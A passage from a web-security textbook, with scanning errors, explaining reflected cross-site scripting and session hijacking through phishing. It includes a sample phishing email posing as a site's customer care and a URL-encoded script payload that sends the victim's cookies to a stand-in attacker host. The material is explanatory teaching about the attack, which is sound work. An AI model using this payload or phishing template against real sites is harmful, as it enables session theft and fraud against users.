Java Reference
In-Depth Information
craft the URL with JavaScript, known as the XSS payload, and send it to the legitimate user of
the site. Upon clicking the malicious link, the attacker's site will be in possession of the session
credentials of the particular Web site for which the attacker wants to gain access. It is interesting
to note an important point here. he cookies from a particular Web server can only be used to
authenticate to the same server/application. herefore, the attacker cannot use his attacker page
to lure individuals into providing session details. he XSS vulnerability in the victim site is used
as the weapon by the attacker to obtain the session credentials of the victim Web application.
Another interesting point to note here is that the legitimate user's browser executes the malicious
JavaScript, because it believes that the JavaScript has originated from the legitimate application.
he browser does not (apparently) violate the
same-origin policy
,
*
and that is why, although the
script originates from elsewhere, it is able to gain access to the cookie, which has been issued by
the legitimate application.
A phishing
†
attack ideally exempliies this type of an attack. he attacker sends the malicious
URL containing the XSS payload to the unsuspecting user. Popular Web sites like PayPal and
eBay were also the victims of phishing-based XSS attacks. he attacker sends the user an email
saying something on the lines of the following:
From: customer.care@legit-web-application.com
To: unsuspecting.user@emailsite.com
Subject: Account Maintenance activity
Dear User
Application maintenance activity for all the users of legit-web-
application has been scheduled between the 21st and 23rd September 2009.
The next time you login to your account, please click on the following
link to activate the maintenance activity for your account.
https://www.legit-web-application.com/app/errorPage.jsp?infoMessage=%3Csc
ript%3Evar+i%3Dnew+Image%3B+i.src%3D%u201Dhttp%3A//www.i-am-attacker.
com%u201D%252bdocument.cookie%3C/script%3E
Please perform this activity to avoid any disruptions in your service
Regards
Customer Care Team - Legit-Web-Application.
A user would not suspect any foul play based on this email. Firstly, the Web site mentioned in
the email is the domain of the legitimate Web application. he user does not understand that the
XSS vulnerability has been identiied by an attacker in the legitimate Web application. Moreover,
the user is lulled into a false sense of comfort because of the presence of
https
, which means that
the connection is encrypted. Several popular Web sites all over the world like PayPal and eBay fell
prey to phishing attacks, where the XSS vulnerabilities on their Web sites were used to perpetrate
session hijacking attacks, where their users would trust an email from them and click on the link,
thereby causing their session credentials to be transmitted to an attacker.
Relected XSS, as can be seen from the above example, is a product of the value of the applica-
tion. Relected XSS on an informational site may not be as dangerous or nefarious in intent as a
relected XSS vulnerability on a Internet banking Web site. Session credentials being lost to an
attacker on an Internet banking site could have disastrous results, where amounts could be trans-
ferred and customer identities could be stolen.
*
he same origin policy prevents a document or script loaded from one origin from getting or setting properties
of a document from another origin.
†
Phishing has been deined in Chapter 3.
Search WWH ::
Custom Search